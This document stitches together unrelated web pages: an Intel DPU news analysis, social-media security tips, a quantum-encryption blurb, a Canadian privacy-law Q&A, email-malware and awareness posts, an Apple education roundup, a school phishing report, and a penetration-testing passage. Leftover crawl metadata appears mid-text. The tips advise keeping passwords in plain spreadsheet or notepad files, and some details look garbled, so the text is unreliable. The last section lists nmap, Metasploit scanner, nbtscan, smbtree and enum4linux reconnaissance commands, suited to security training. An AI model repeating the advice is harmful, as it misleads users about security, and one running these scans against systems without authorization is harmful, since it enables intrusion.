We said this a long time ago, and we are going to say it again now. One big reason that Intel paid $16.7 billion to buy FPGA maker Altera was that it was hedging on the future of compute in the datacenter and that it could see how the hyperscalers and cloud builders might offload a lot of network, storage, and security functions from its Xeon CPU cores to devices like FPGAs. Given this, it was important to have FPGAs to catch that business, even if at reduced revenues and profits.
It has been six years since that deal went down, and our analysis of why Intel might buy Altera, which we did ahead of the deal, still stands on its merits. It has perhaps taken more time for the Data Processing Unit, or DPU, to evolve from a SmartNIC, which is a network interface card with some brains on it to handle specific tasks offloaded from pricey CPU cores. Just to be different, Intel is now calling these advanced SmartNICs Infrastructure Processing Units, or IPUs, and they are distinct from CPUs, GPUs, and other XPUs like machine learning accelerators or other custom ASICs.
In the end, IPUs might have a mix of CPUs, XPUs, and other custom ASICs, in fact, based on the presentation given today by Navin Shenoy, who is general manager of the Data Platforms Group at the chip maker, at the online Six Five Summit hosted by Moor Insights and Futurum.
Let’s be frank for a second. Way back in the dawn of time, when transistors were a lot more scarce than they are today – but maybe as relatively scarce as they will soon become – the central processing unit was just that: one of a very large number of devices that managed a data processing flow across interconnected hardware. It’s called a main frame for a reason, and that is because there were lots of other frames performing dedicated tasks that were offloaded from that very expensive CPU inside that main frame. It is only with the economic benefits of decades of Moore’s Law advances from the 1960s through the 2000s that we could finally turn what we still call a CPU into something that more accurately can be thought of as a baby server-on-chip. Just about everything but main memory and auxiliary memory is now within the server CPU socket. But as Moore’s Law advances are slowing and CPU cores are expensive and can’t be wasted, the time has come to turn back the clock and offload as much of the crufty overhead from virtualized, containerized, securitized workloads from those CPU cores as possible. The DPU is not new, but represents a return to scarcity, a new twist on old ideas. (Which are the best kind.)
Shenoy did not tip Intel’s hand too much in talking about its DPU strategy – we are not calling them IPUs until there is a consensus across all glorified SmartNIC makers to do so – but he did provide some insight into Intel’s thinking and how, if Jevons Paradox holds, the DPU that gets offloaded work should result in an increase in CPU demand in the long run, even if it causes a hit in the short run.
Back in 1865 in England, William Stanley Jevons observed that as machinery was created that more efficiently burned coal for various industrial uses, coal demand did not drop, but rather increased – and importantly, increased non-linearly. This is counter-intuitive to many, but what it really showed is that there was a demand for cheap, high-density energy that could do what muscle power or water power could not. We have some contrarian thoughts about the applicability of Jevons Paradox to the datacenter, which we brought up six years ago when Intel first started applying this paradox to the long term capacity needs of compute in the datacenter. There are only so many people on Earth, there are only so many hours in a day, and therefore only so much data processing that can ever need to be done. We aren’t there yet for computing overall, but certain classes of online transaction processing have been growing at only GDP rates for two decades now.
But there definitely is a kind of elasticity of demand in compute thus far, and Shenoy actually gave out some data that showed that as the cost came down, demand went up, with some exceptions where efficiencies caused a flattening in demand. The example Shenoy gave was the introduction of server virtualization on VMware platforms in the early 2000s, and combined with the dot-com bust, server shipments definitely flatlined for two years.
There are so many factors that caused the flatlining of server sales at that time that it is hard to argue virtualization on the X86 platform, which was nascent at the time with VMware just getting started with server products, was the main cause, much less the only one. Virtualization was definitely a big factor in 2008 and 2009, when the Great Recession hit and server CPUs had features added to them to accelerate virtualization hypervisors and radically cut their overhead. But that just became a built-in assumption from that point forward, until containers came along in earnest about five years ago. The advent of containers and DPUs, we think, is going to push a lot of workloads back to bare metal servers and off VMs.
While counting server processors is interesting, trying to reckon server capacity is more interesting, and we have done this, as we showed in a story last week discussing Q1 2021 server sales.
It is well known that Intel is the FPGA supplier for Microsoft’s SmartNICs, and Shenoy reminded everyone of that, and also hinted that it would be delivering SmartNICs that have Xeon D processors on them, much as Amazon Web Services has multi-core Arm CPUs on its “Nitro” DPUs, which virtualize all network and storage for AWS server nodes as well as run almost all of the KVM hypervisor functions, essentially converting the CPU to a bare metal serial processor for shared applications.
Shenoy did not provide any insight into what components and capacities these future Intel DPUs would have, but walked through the usual scenario we have heard from Mellanox/Nvidia, Fungible, Pensando, Xilinx, and others in recent years.
“We call this silicon solution a new unit of computing, the infrastructure processing unit or the IPU,” explained Shenoy. “It’s an evolution of our SmartNIC product line that when coupled with a Xeon microprocessor, will deliver highly intelligent infrastructure acceleration. And it enables new levels of system security control isolation to be delivered in a more predictable manner. FPGAs can be used to attach for workload customization and overtime these solutions become more and more tightly coupled. So blending this capability of the IPU with the ongoing trend in microservices is a unique opportunity for a function-based infrastructure to achieve more optimal hardware and software. To deal with overhead tax and more effectively orchestrate the software landscape on a complex datacenter infrastructure.”
The newsy bit is that Chinese hyperscalers Baidu and JD Cloud are working on DPUs with Intel, apparently, and the fact that Intel is working with VMware, much as Nvidia is, is no surprise at all. What is surprising is that it didn’t happen before the Nvidia deal, to be honest, and we strongly suspect it is something that Pat Gelsinger, the former CEO at VMware and the current CEO at Intel, fixed shortly after he took his new job. Nvidia is working, through Project Monterey, to get the ESXi hypervisor ported to its Arm-based BlueField-2 line of DPUs, which will also have GPU acceleration for AI and hashing functions, among other things. We would not be surprised, as we have said, to see Intel buy VMware outright once Dell lets go of it later this month.
Whatever Intel is going to do with DPUs, we will find out more in October at its Intel On event, formerly known as Intel Developer Forum, which Gelsinger revived when he came back to the chip maker.
The use of social media is increasing day by day. Social media provide us with lots of stuff for entertainment, learning, and earning. At the same time, there are many side effects of using social media.
While using any application online, your security is exposed to the internet. You have to take some precautionary measures to secure your online presence on the internet.
If you are not following any precautionary measures, you will end up compromising your privacy. There are a lot of bad guys (hackers) on the internet. Hackers are looking for different ways to steal your sensitive information, like your mobile number, credit card number, and other personal details. They can sell these details on the dark web, and your data can be used for different illegal purposes without your consent.
But wait, you don’t need to worry at all. By following some tips, you can effectively secure your online presence on Facebook and other social networks. We are presenting you with the top 5 tips to stay safe on social media.
5 Tips on How to Keep Your Social Media Accounts Safe
1. Be selective with third-party applications
Third-party apps like social media post schedulers will need access to your account. Verify that only legitimate applications are granted access. Also, read the details of what you are permitting the application to access.
For example, some applications only require minimal permissions to read and upload content, so always read the fine print before granting permission. Log in to all of your social network accounts and see what apps you presently give access to. These links to popular social networks might help you figure out what you’re authorizing; withdraw access to anything you don’t trust or don’t use.
2. Use Strong Password
Remembering “strong” passwords can be a chore. Until he was hacked, Facebook creator Mark Zuckerberg didn’t like complex passwords.
His Twitter, Instagram, and Pinterest accounts were hacked, revealing his password as “Dadada.” This shows that most individuals don’t take password strength seriously. But you need to choose a strong password to keep your accounts secure from hackers.
There are certain tools available to check the strength of passwords, but I always recommend the manual method of checking password strength. Try to use letters, numbers, and special characters to set a strong password. This combination will keep your account secure from brute-force attacks. For example, instead of a single dictionary word, combine uppercase and lowercase letters, digits, and symbols into a long phrase that only you would recognize.
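To make that manual check concrete, here is a small Python sketch (my illustration, not a tool from the original article) that flags passwords that are too short or missing a character class; the 12-character minimum is an assumption you can adjust.

```python
import string

def password_issues(password: str, min_length: int = 12) -> list[str]:
    """Return a list of reasons a password looks weak (empty list = no obvious issues)."""
    issues = []
    if len(password) < min_length:
        issues.append(f"shorter than {min_length} characters")
    if not any(c.islower() for c in password):
        issues.append("no lowercase letters")
    if not any(c.isupper() for c in password):
        issues.append("no uppercase letters")
    if not any(c.isdigit() for c in password):
        issues.append("no digits")
    if not any(c in string.punctuation for c in password):
        issues.append("no special characters")
    return issues

if __name__ == "__main__":
    for candidate in ["dadada", "Winter2022", "c0rrect-H0rse!battery"]:
        problems = password_issues(candidate)
        print(candidate, "->", problems or "looks reasonably strong")
```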
3. Use Antivirus
Choose a reputable ISP in your area; some local service providers pay little attention to security, which can result in user data breaches. You should also install an antivirus tool like AVG, which has a free version. I recommend the pro version, but if your budget is tight, the free version is better than no protection at all.
4. Enable 2FA
Two-factor authentication is one of the best ways to secure your social media accounts. If you are using this feature, a hacker will not be able to log in even if he manages to steal your password. It verifies a user’s identity by using two different components: generally, the account password and a confirmation code provided through text message or email.
To be honest, ignoring this feature is asking for disaster. It’s worth the extra effort to keep your accounts safe. Here are guidelines for Facebook, Twitter, LinkedIn, and Instagram.
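If you are curious how the confirmation codes from an authenticator app are produced, the following Python sketch (added here for illustration, not part of the original guidelines) implements the standard time-based one-time password (TOTP, RFC 6238) calculation; the base32 secret shown is a made-up example.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, digits: int = 6, period: int = 30) -> str:
    """Compute a time-based one-time password from a base32-encoded shared secret."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // period                  # 30-second time step
    msg = struct.pack(">Q", counter)                      # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                            # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

if __name__ == "__main__":
    # Example secret only -- real secrets come from the service's 2FA setup QR code.
    print(totp("JBSWY3DPEHPK3PXP"))
```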
5. Store passwords Securely
Password storage is one of the main issues most internet users face. I always recommend storing passwords offline. When you store passwords online, you risk exposing your privacy. You can keep your passwords in an Excel sheet or a notepad file and store them on your desktop or hard drive.
Still, if you want to store your passwords online, make sure you use secret keys to protect them. Never save a Facebook password in a file named after Facebook. You can use a different key to name the file; for example, for Facebook, you could name the file “buukif”. This is just an example, but it will help keep the Facebook password safe: even if someone gets hold of the password file, he will not be able to figure out that the password belongs to Facebook.
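If you do keep a password file on disk, you can go a step beyond an obscure file name and encrypt the file itself. The sketch below is my own example and assumes the third-party Python cryptography package is installed; the file name and contents are placeholders.

```python
from cryptography.fernet import Fernet

# Generate a key once and keep it somewhere safe, separate from the encrypted file.
key = Fernet.generate_key()
fernet = Fernet(key)

secrets = "facebook: correct-horse-battery-staple\n"      # placeholder contents
encrypted = fernet.encrypt(secrets.encode("utf-8"))

with open("passwords.enc", "wb") as handle:               # placeholder file name
    handle.write(encrypted)

# Later: load the file and decrypt it with the same key.
with open("passwords.enc", "rb") as handle:
    restored = Fernet(key).decrypt(handle.read()).decode("utf-8")
print(restored)
```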
If you like this detailed article on how to keep your social media accounts safe, don’t forget to share it with the community around you. For more online security tips and guides, visit nextdoorsec.com.
Quantum encryption is the expected exponential increase in difficulty when quantum computing is applied to encoding and decoding data.
Quantum computers, while still a way off, are thought to be a threat to the encryption that today’s classical computers use. Because the former are thought to be able to perform the work of the latter in a fraction of the time, scientists anticipate that nation states and other large, well-resourced adversaries may leverage their power to break encryption. As a response to the threat, markedly more complex quantum encryption would have to arise. The gap between when one competitor in that “crypto arms race” gains quantum capability and when the other does is problematic for the party lacking it, since its adversary might overtake its defenses immediately.
The threat, and indeed the conversation, are still hypothetical. Whether quantum computing’s power will be far higher than that of any classical supercomputer remains an open question. In addition to quantum encryption’s threat being an unsettled science, the near-infeasible investment and implementation requirements of quantum computers make a quantum encryption war unlikely for perhaps the next decade, and one that, when it does come, will likely emerge publicly.
"Quantum computing's rise is a decade or more in the future, and limited to entities with the resources to develop and maintain it. Once it moves from the development stage and into production, we'll also see quantum encryption with exponentially more difficulty as a natural component to securing these advanced machines." | <urn:uuid:21af0d0e-ce28-4492-998b-eac4aa5e9037> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/quantum-encryption | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00601.warc.gz | en | 0.953179 | 297 | 2.890625 | 3 |
Introduction. The Personal Information Protection and Electronic Documents Act (PIPEDA) received Royal Assent on April 13, 2000, and came into force in stages, beginning on January 1, 2001. PIPEDA came fully into force on January 1, 2004.
When did the personal information Act come into effect?
PIPA was introduced in the Alberta Legislature as Bill 44 on May 14, 2003 and came into effect on January 1, 2004. PIPA has been amended by the following statutes (in chronological order of date of enactment):
Why was the Personal Information Protection and Electronic Documents Act enacted?
PIPEDA became law on 13 April 2000 to promote consumer trust in electronic commerce. … Under the Act, personal information can also be disclosed without knowledge or consent to investigations related to law enforcement, whether federal, provincial or foreign.
When did Canada’s Digital Privacy Act come into effect?
Our world has changed dramatically since Canada’s Privacy Act came into force in 1983.
What is PII in Canada?
Under PIPEDA, the following is considered sensitive or Personally Identifiable Information (PII) and is explicitly protected under the law: Age, name, ID numbers, income, ethnic origin, or blood type. Opinions, evaluations, comments, social status, or disciplinary actions.
What is the Privacy Act 1974 cover?
The Privacy Act of 1974, as amended, 5 U.S.C. § 552a, prohibits the disclosure of a record about an individual from a system of records absent the written consent of the individual, unless the disclosure is pursuant to one of twelve statutory exceptions. …
What is covered under the Privacy Act 1988?
The Privacy Act 1988 (Privacy Act) is the principal piece of Australian legislation protecting the handling of personal information about individuals. This includes the collection, use, storage and disclosure of personal information in the federal public sector and in the private sector.
When was PIPEDA last amended?
In April 2018, the Canadian government published an amendment to the Personal Information Protection and Electronic Documents Act (PIPEDA). The amendment, titled Breach of Security Safeguards Regulations, is effective November 1, 2018.
When did PIPEDA go into effect?
PIPEDA came into force on January 1, 2001 and was implemented in three stages. At each stage, the list of organizations required to comply with the privacy requirements of the Act expanded, with the final stage taking effect on January 1, 2004.
Is PIPEDA a statute?
The Personal Information Protection and Electronic Documents Act (PIPEDA) is the federal privacy law for private-sector organizations. It sets out the ground rules for how businesses must handle personal information in the course of their commercial activity.
What is Bill C 36 Canada?
Bill C-36, the Protection of Communities and Exploited Persons Act, received Royal Assent on November 6, 2014. Bill C-36 treats prostitution as a form of sexual exploitation that disproportionately impacts women and girls. … Its stated aims include protecting communities, and especially children, from the harms caused by prostitution.
What federal statutes have been enacted to protect privacy rights?
The key data protection statutes in Canada are: Federal: Personal Information Protection and Electronic Documents Act 2000 (‘PIPEDA’); British Columbia: Personal Information Protection Act, SBC 2003 c 63 (‘BC PIPA’); Alberta: Personal Information Protection Act, SA 2003 c P-6.5 (‘AB PIPA’); and.
What happened to Bill c11?
Bill C-11 – Digital Charter Implementation Act, 2020: An attempt to update federal privacy legislation to address online activities in particular. The bill saw a few hours of debate at second reading, but never reached committee study. … The bill was stalled repeatedly through both second reading and at committee.
Does Canada have a Hipaa?
What are the rules in Canada when it comes to patient privacy? Canada’s federal law, the Personal Information Protection and Electronic Documents Act (PIPEDA), is comparable in many ways to the Health Insurance Portability and Accountability Act (HIPAA) in the United States.
Is a cell phone number considered personal information?
Personally Identifiable Information (PII), or personal data, is data that corresponds to a single person. PII might be a phone number, national ID number, email address, or any data that can be used, either on its own or with any other information, to contact, identify, or locate a person.
What are the 8 principles of the DPA?
What Are the Eight Principles of the Data Protection Act?
- Fair and Lawful Use, Transparency. The principle of this first clause is simple. …
- Specific for Intended Purpose. …
- Minimum Data Requirement. …
- Need for Accuracy. …
- Data Retention Time Limit. …
- The right to be forgotten. …
- Ensuring Data Security. …
What are Malware Attacks?
The purpose of a malware attack is to install malicious software on a victim’s computer. Short for “malicious software,” malware is a file or code that can be used to conduct any type of harmful behavior the attacker designs.
How Does a Malware Attack Typically Work?
Like other types of cyber attacks, malware is disproportionately delivered through email, but can also be distributed using other methods, such as Remote Desktop Protocol (RDP) access and drive-by downloads from compromised websites. There are many kinds of malware, but most attackers use malware to infect, explore, steal, and exfiltrate data from their victims. Some of the more common types of malware distributed through email include the following:
Ransomware: Any type of extortion malware that locks your computer and demands payment in exchange for freeing your systems.
Remote Access Trojan (RAT): Malware that allows an attacker to take control of a victim’s computer.
Spyware: Malware that collects data and/or information without a person’s consent, which may include keyloggers, information stealers, or adware.
Trojan: A piece of malware that disguises itself as a legitimate application, such as a Word document or Excel spreadsheet.
Why Does Malware Bypass Traditional Email Security?
Sophisticated threat actors can couch malware in a seemingly normal email. While traditional email security can detect an obviously malicious attachment, attackers can hide the malware and trick victims into accessing it.
For example, an email may contain a legitimate-looking URL, but that URL redirects to a malicious site. Or it’s a harmless-looking document with instructions to download a form, which is in reality a malicious file. Traditional email security won’t spot anything suspicious in these emails.
Attackers can send such emails with a plausible story that tricks victims into interacting. When malware is hidden and sent alongside legitimate requests, or when it is part of a multi-step process, it can be difficult for targets to spot the danger.
How Can Modern Email Security Detect Malware?
Attackers send hidden malware alongside social engineering tactics to trick a victim into interacting with it. Modern email security can scan emails for suspicious links and attachments and detect suspicious requests that are a cornerstone of malware delivery—even when they use never-before-seen URLs.
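As a rough illustration of what link scanning can look like (not how any particular vendor implements it), the Python sketch below extracts URLs from an email body and flags a few common red flags; the patterns and keyword list are assumptions you would tune in practice.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
BAIT_WORDS = ("login", "verify", "password", "invoice")   # assumed keyword list

def suspicious_urls(email_body: str) -> list[tuple[str, str]]:
    """Return (url, reason) pairs for links that match simple phishing heuristics."""
    findings = []
    for url in URL_RE.findall(email_body):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            findings.append((url, "link points at a raw IP address"))
        elif host.count(".") >= 4:
            findings.append((url, "unusually deep subdomain chain"))
        elif any(word in parsed.path.lower() for word in BAIT_WORDS):
            findings.append((url, "credential- or payment-themed path"))
    return findings

if __name__ == "__main__":
    body = "Please verify your payroll details at http://203.0.113.7/login before 5pm."
    for url, reason in suspicious_urls(body):
        print(f"{url} -> {reason}")
```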
Suspicious requests often come with manufactured urgency, and behavioral-based email security can detect these tone and context irregularities. Spoofed email addresses and rewritten URLs are also hallmarks of malware attacks that modern email security detects. When combined, these indicators provide enough insight to block these malware attacks.
Cyber Security Awareness Month: How Cyber Secure Are you?
- October 10, 2018
As of July 2018, there were a total of 4.1 billion active internet users worldwide. This shows that people across the globe are increasingly relying on the internet for literally everything. In fact, they have their confidential data saved online. As a result, we hear a new story about cyber attacks every day.
The US Department of Homeland Security (DHS) and the National Cyber Security Alliance launched a cyber security awareness program in 2004. The main objective behind this campaign was to create awareness about online safety measures among the masses.
Cybersecurity attacks have affected businesses worldwide. According to statistics:
- The total number of publicly disclosed data breaches in 2017 was 1579.
- By 2021, the damage costs incurred by cybercrime is expected to hit $6 trillion.
As part of the global effort to increase cyber security awareness, the month of October is dedicated to increasing end-user information security awareness within organizations. As one of the world’s leading providers of information security consulting and IT training, Kualitatem is also actively conducting a cyber security awareness drive to help you develop critical cybersecurity skills.
Ways to Increase Cybersecurity Awareness Among Management
- Consider security initiatives as an integral part of business objectives.
- Arrange weekly meetings to discuss your present security initiatives and recent updates related to breaches.
- Use industry benchmarks and audit findings, such as BSIMM, to show management where security measures can be improved.
- Keep management alert to ransomware, spear-phishing, and other hacking operations targeting executives, and teach methods to avoid them.
Ways to Increase Cybersecurity Awareness Among Developers
- Show developers the attacker’s point of view, using specific snippets from your own applications.
- Arrange IT security sessions with developers and let the security team members explain existing vulnerabilities. This will also help the security team understand the developers’ perspective on secure coding.
- Look at methods to make secure coding simpler for developers, such as integrating resources and security testing early in the software development lifecycle.
- Always ask developers to give feedback about how security policies align with workflows.
Ways to Increase Cybersecurity Awareness Among All Employees:
- Find security champions all across the organization, not just in the development team. This will guarantee that security messages are being followed by all employees.
- Use actual cases of breaches accomplished by phishing and social engineering targeted at non-security employees.
- Explain to employees the risks of posting confidential information online and the ways in which hackers can use it against them.
Kualitatem understands the significance of being cognizant and alert in cyberspace. Our aim is to train you to identify the role you play in mitigating potential cyber threats, which come in all forms.
In the final chapter of our Apple in classroom series, we hear from six more educators on ways Apple has impacted their classrooms.
Vickie S. Cook, Ph.D., Director of the University of Illinois at Springfield’s Center for Online Learning, Research and Service @DrVickieCook
Using the power of touch to teach and challenge students.
For Vickie S. Cook, director of the University of Illinois at Springfield’s Center for Online Learning, Research and Service, it’s all about using the power of touch to create a new experience for students: “Students can touch and interact with devices such as the iPhone, iPad, and Mac products using sensory perception that engages learners in new ways that teach and challenge the students. This highly visual approach allows students to engage with learning objects to build the skills needed in the 21st century.”
Apple technology has delivered educators the ability to tailor learning to individuals, groups and entire classes. This means that teachers can level the playing field for students with varying learning modality preferences, and create solid visualizations of concepts more easily. It also helps “bring learning to life anytime, anywhere, through connectivity and a highly personalized, visual environment,” she adds.
Sam Gliksman, EdTech Author, Speaker, Consultant and Owner/Blogger for EducationalMosaic.com @samgliksman
It’s not just about tech. Traditional educational paradigms are changing.
“To be absolutely clear it's far more about changing traditional educational paradigms than about any one particular device,” explains Sam Gliksman, EdTech consultant and owner/blogger of EducationalMosaic.com.
Gliksman is partial to the iPad as it allows students to engage with material in new ways. One example he offers is a field trip to a California mission where students used their iPads to capture photos, sounds and interviews. Coming back, they recorded video in front of a green screen, acting as virtual tour guides for the mission as they weaved images and sounds in and out of the video background. “Mobile devices such as iPads empower students with tools that spark creativity and innovation,” he says.
Tom Kuhlmann, Chief Learning Architect at Articulate.com @tomkuhlmann
With classroom content it’s now “pull over push.”
It's one thing for people to easily consume content as part of their learning. And mobile devices do that. But the more interesting part is that they allow the learners to create and share what they learned, says Tom Kuhlmann, chief learning architect at Articulate.com. “This ability to integrate creativity with personal learning and then share it with others not only creates a dynamic learning experience, it [also] makes it fun and engaging,” he adds.
Kuhlmann calls out the App Store and “all of the easy-to-use content creation apps” as a valuable resource that is helping change the learning and teaching dynamic from push to pull. “In the past, learning was mostly a push mechanism where the instructor pushed content out for the learner to consume. Today, the Apple devices let learners easily explore and pull content in,” says Kuhlmann. “They also allow anyone to create their own content and in turn demonstrate better understandings of what they’ve learned.”
Cory Tressler, Associate Director at the Ohio State University @TresslerTech
Mobile technology is sparking a revolution in education.
“Students, teachers, parents and administrators are all now part of a highly mobile society that has access to an incredible amount of information, collaboration tools and computing power right in the palm of their hand. Apple sparked this revolution and it has transitioned into education,” states Cory Tressler of the Ohio State University.
He is a firm believer in the iPad, describing it as “the most powerful educational technology tool ever developed,” as it provides “a mobile option for schools, teachers and students that is extremely powerful, easy to use, and enhances any learning environment.” From creating video and photos, to accessing information and research, to taking notes and writing papers, Tressler says, “it delivers any student of any age the power to do and learn instantly.”
Brianna Crowley, Teacherpreneur at The Center for Teaching Quality (CTQ) @AkaMsCrowley
The mobile device as a portal to grow student imagination.
Apple is making learning accessible through its touch interface and quality education apps, says Brianna Crowley, teacherpreneur at the Center for Teaching Quality.
From kindergarteners that cannot yet type, or high schoolers seeking individualized learning experiences, the iPad offers wonderful tools. The same goes for students with disabilities: “When a special education teacher asks for technology support for students with disabilities, I can confidently suggest an iPad because of the accessibility settings.”
Crowley loves the iPhone because it blurs the boundaries between classroom and "real world" for both herself and her students. “I love showing them how a device they used mainly for social or family communication can help them take ownership over their learning process. Showing them this helps me also reinforce the idea that learning happens everywhere, constantly,” she says. “Our devices are simply portals for our imaginations to take shape or our curiosities to be explored.”
John Wetter, Technology Services Manager at Hopkins Public Schools @johnwetter
Students constantly surprise us by what they do on their iPads.
“Look at what students are doing every day and you’ll see the transformation in learning,” says John Wetter of Hopkins Public Schools who is charged with managing over 4,000 iPads used by the district’s students.
He calls out the iPad as a transformative device in education. “Seeing an elementary student start programming with an app like Kodable, to students creating an entire movie project in iMovie on their iPad really shows the creative power unleashed in this environment,” he says. “Great teachers working with great technology to help enhance student learning, it's what we're all about.”
We’d love to hear about your experience or thoughts on technology in the classroom. If you have an idea, feel free to join the conversation by Tweeting @JAMFSoftware with your insight or story.
And as an added bonus, during the International Society for Technology in Education (ISTE) conference, we’re hosting an “Apple a Day Giveaway” Twitter contest where you could win an Apple TV. Simply tell us why or how you leverage Apple in the classroom.
Interested? Learn more about the rules and participation criteria.
As computer systems become embedded in every aspect of our lives, no one is safe from cyber attacks. Public schools are particularly vulnerable, as they store sensitive data on their students and employees but often lack the training and equipment to adequately defend it. A recent attack against the Morton School District in Illinois demonstrates just how widespread the risk is. It also serves as an example of what school districts should and should not do to prevent and respond to attacks, potentially helping other schools to keep themselves safe in the future:
Analyzing The Attack
On 31 January 2017, Russian hackers used a phishing scam to gain access to sensitive data from the Morton School District in Tazewell County, Illinois. The hackers sent an email claiming to be from Lindsey Hall, the district’s superintendent, requesting information for W2 forms. A staff member responded to the email by sending out the names, social security numbers, and salary information for 400 of the district’s employees. When the employee received another email from that address requesting more information, she became suspicious and contacted the police. Investigators determined that the email had not come from the superintendent, tracing it to Russian servers instead.
Because the district acted quickly, the potential damage from this attack is low. Although the hackers learned the social security numbers of 400 employees, they did not receive their birth dates or addresses, limiting what they can do with those numbers. Authorities provided the affected employees with tracking applications they could use to monitor for unusual activity involving their social security numbers. Nonetheless, the fact that Russian hackers successfully stole information from an Illinois school district is unsettling, prompting concerns that other schools may be at risk.
In many ways, the Morton School District is a model for how to respond to cyber attacks. The staff quickly identified suspicious activity, contacted the authorities, and took the necessary steps to keep themselves safe. Ideally, however, school districts should never have to respond to an attack in the first place, which means keeping the risk of hacking to a minimum through preventative measures.
Colorado Computer Support provides schools, businesses, and all other Colorado Springs institutions with valuable cyber security support. For more information on keeping yourself safe, contact firstname.lastname@example.org or (719) 355-2440 today.
Active Information Gathering
Once we have exhausted the possible ways to passively collect information about our target, we will turn to active collection. These tools and methods are more powerful and can provide us with more information, but at the same time, they may expose us to detection. Let’s have a look at some common techniques.
Wireshark is a protocol analyzer (aka packet analyzer) and the best tool available for analyzing network traffic, and it is highly recommended that everyone become very familiar with its usage. Technically Wireshark takes packet data and gives you many ways to examine and analyze it. You are going to encounter Wireshark very often as a cyber professional, so it’s to your benefit to dive in and make yourself an expert.
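If you want to poke at live traffic programmatically rather than in the Wireshark GUI, Scapy offers a quick way to do so from Python. The sketch below is an added illustration, not part of the original material; it assumes Scapy is installed, captures on the default interface, and requires root privileges and permission to sniff that network.

```python
from collections import Counter

from scapy.all import sniff, IP  # requires scapy and root/administrator privileges

talkers = Counter()

def tally(packet):
    """Count packets per source IP so we can see who is chattiest on the wire."""
    if IP in packet:
        talkers[packet[IP].src] += 1

# Capture 200 packets on the default interface, then print the top talkers.
sniff(count=200, prn=tally, store=False)
for source, packets in talkers.most_common(5):
    print(f"{source:15} {packets} packets")
```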
Nmap is a network mapper primarily used to identify the existence of network hosts or devices, ports, services and vulnerabilities. It is the tool of choice for network enumeration and will most likely be the first tool to get detected by network defense devices. While there are ways to do this graphically, learning Nmap from the command line will really help you to better appreciate its capabilities and at the same time help you feel more accustomed to working with a command-line interface (CLI).
An ideal enumeration process is:
- Host Identification
- Port Identification
- Service Identification
- Vulnerability Identification
Yes, you can perform these tasks separately or with one command. The point is to keep your attack surface low while being accountable for your traffic. Some commands to perform these tasks are:
nmap -sn 10.0.6.200-254
nmap -v -T4 -sS -Pn --top-ports 10 10.0.6.200-254 --open
nmap -v -T4 -sT -Pn --top-ports 10 10.0.6.200-254 --open
nmap -v -T4 -sV -Pn --top-ports 25 10.0.6.200-254 --open
nmap -v -T4 -sV -sC -Pn -F 10.0.6.200-254 --open
nmap -v -T4 -A -p- 10.0.6.200-254 --open --randomize-hosts
nmap -v -T4 -p 445 --script=smb-vuln-ms10-061 10.0.6.200-254 --open
nmap -v -T4 -sU -sT -sV -p U:53,11,137,161,T:22,139,445 10.0.6.200-254 --open
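The same host- and service-identification steps can also be scripted. The following sketch is an added example (not from the original course) that uses the third-party python-nmap wrapper against the lab range used above; adjust the range and arguments to your own environment, and only scan networks you are authorized to test.

```python
import nmap  # pip install python-nmap; the nmap binary must also be installed

scanner = nmap.PortScanner()

# Step 1: host identification (ping sweep, mirrors `nmap -sn`).
scanner.scan(hosts="10.0.6.200-254", arguments="-sn")
live_hosts = [h for h in scanner.all_hosts() if scanner[h].state() == "up"]
print("Live hosts:", live_hosts)

# Steps 2-3: port and service identification on whatever answered.
for host in live_hosts:
    scanner.scan(hosts=host, arguments="-T4 -sV --top-ports 25 --open")
    if host not in scanner.all_hosts():
        continue
    for proto in scanner[host].all_protocols():
        for port, info in scanner[host][proto].items():
            print(f"{host} {proto}/{port} {info['name']} {info.get('product', '')}")
```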
Scanning with Metasploit
Although scanning with Nmap is very popular, you can also use Metasploit auxiliary modules to perform scans. Below are some examples:
- 21 auxiliary/scanner/ftp/anonymous
- 21 auxiliary/scanner/ftp/ftp_version
- 22 auxiliary/scanner/ssh/ssh_version
- 23 auxiliary/scanner/telnet/telnet_version
- 25 auxiliary/scanner/smtp/smtp_version
- 69 auxiliary/scanner/tftp/tftpbrute
- 79 auxiliary/scanner/finger/finger_users
- 80 auxiliary/scanner/http/http_version
- 110 auxiliary/scanner/pop3/pop3_version
- 111 auxiliary/scanner/misc/sunrpc_portmapper
- 123 auxiliary/scanner/ntp/ntp_monlist
- 143 auxiliary/scanner/imap/imap_version
- 512 auxiliary/scanner/rservices/rexec_login
- 513 auxiliary/scanner/rservices/rlogin_login
- 514 auxiliary/scanner/rservices/rsh_login
- 1521 auxiliary/scanner/oracle/sid_enum
- 3306 auxiliary/scanner/mysql/mysql_version
- 5432 auxiliary/scanner/postgres/postgres_version
- 5900 auxiliary/scanner/vnc/vnc_none_auth
- 6000 auxiliary/scanner/x11/open_x11
- 9100 auxiliary/scanner/printer/printer_version_info
- 50000 auxiliary/scanner/db2/db2_version
NBTScan is a command-line scan tool, running on Windows or Linux, which displays NetBIOS information. It may even display logged-in users and a device’s purpose. This is helpful when building your initial hosts and users list.
# nbtscan 10.0.6.200-254
# nbtscan -v 10.0.6.200-254
C:> nbtscan 10.0.6.0/24
smbtree is a text-based SMB network browser that can list domains, servers, and shares:
# smbtree -b
# smbtree -D
# smbtree -S
enum4linux gives a multitude of information from a target machine. This can include usernames, password policies, user and group information, etc. It also shows what commands were used to get that information. This does not work all the time. A basic example of this would be:
# enum4linux 10.0.6.218
The host command can be used in many ways to identify information for a particular host or website. This is a good way to begin DNS and/or network infrastructure enumeration. For example:
# host www.facebook.com
facebook.com has address 220.127.116.11
facebook.com has IPv6 address 2a03:2880:2110:df07:face:b00c:0:1
facebook.com mail is handled by 10 msgin.t.facebook.com.
An example of a successful search for ipv6.google.com is the following:
# host ipv6.google.com
ipv6.google.com is an alias for ipv6.l.google.com.
ipv6.l.google.com has the IPv6 address: 2607:f8b0:4004:801::1004
To identify mail servers and name servers using the host command:
# host -t mx cover6solutions.com
